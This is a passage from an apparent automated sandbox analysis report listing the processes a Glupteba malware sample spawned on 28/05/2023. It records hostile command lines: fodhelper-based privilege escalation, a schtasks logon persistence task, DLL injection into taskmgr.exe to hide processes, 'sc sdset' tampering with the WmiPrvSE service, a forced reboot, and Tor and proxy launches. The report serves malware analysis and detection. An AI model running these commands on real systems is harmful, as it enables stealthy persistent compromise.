                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:27
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:30
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:31
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                          General

                                                          Target ID:32
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:33
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:34
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:35
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:36
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:37
                                                          Start time:11:31:17
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:38
                                                          Start time:11:31:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:39
                                                          Start time:11:31:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:40
                                                          Start time:11:31:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          General

                                                          Target ID:41
                                                          Start time:11:31:21
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:42
                                                          Start time:11:31:21
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:43
                                                          Start time:11:31:21
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          General

                                                          Target ID:44
                                                          Start time:11:31:23
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                          Imagebase:0x7ff7d3a70000
                                                          File size:289792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:45
                                                          Start time:11:31:23
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:46
                                                          Start time:11:31:24
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:fodhelper
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:47
                                                          Start time:11:31:24
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:49
                                                          Start time:11:31:24
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:50
                                                          Start time:11:31:25
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                          General

                                                          Target ID:51
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:52
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:53
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:54
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:55
                                                          Start time:11:31:29
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000037.00000003.208942288673.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          General

                                                          Target ID:56
                                                          Start time:11:31:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:57
                                                          Start time:11:31:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:58
                                                          Start time:11:31:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000003A.00000003.208966850463.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                          General

                                                          Target ID:59
                                                          Start time:11:31:34
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:60
                                                          Start time:11:31:34
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:61
                                                          Start time:11:31:38
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000003D.00000003.209030995606.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          General

                                                          Target ID:62
                                                          Start time:11:31:40
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          General

                                                          Target ID:63
                                                          Start time:11:31:40
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:64
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /s
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:65
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:66
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /d
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:67
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:68
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /s
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:69
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:70
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /d
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:71
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:72
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                          Imagebase:0x7ff769b70000
                                                          File size:288256 bytes
                                                          MD5 hash:D98E33B66343E7C96158444127A117F6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 92%, ReversingLabs

                                                          General

                                                          Target ID:73
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:74
                                                          Start time:11:32:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\shutdown.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:shutdown -r -t 5
                                                          Imagebase:0x7f0000
                                                          File size:23552 bytes
                                                          MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:75
                                                          Start time:11:32:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:76
                                                          Start time:11:32:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:77
                                                          Start time:11:32:14
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:78
                                                          Start time:11:32:19
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt
                                                          Imagebase:0xfb0000
                                                          File size:4466702 bytes
                                                          MD5 hash:055AE7C584A7B012955BF5D874F30CFA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs

                                                          General

                                                          Target ID:79
                                                          Start time:11:32:20
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          Imagebase:0x690000
                                                          File size:236544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:80
                                                          Start time:11:32:20
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:81
                                                          Start time:11:32:20
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          Imagebase:0x1b0000
                                                          File size:61440 bytes
                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:82
                                                          Start time:11:34:16
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
                                                          Imagebase:0x70000
                                                          File size:7344128 bytes
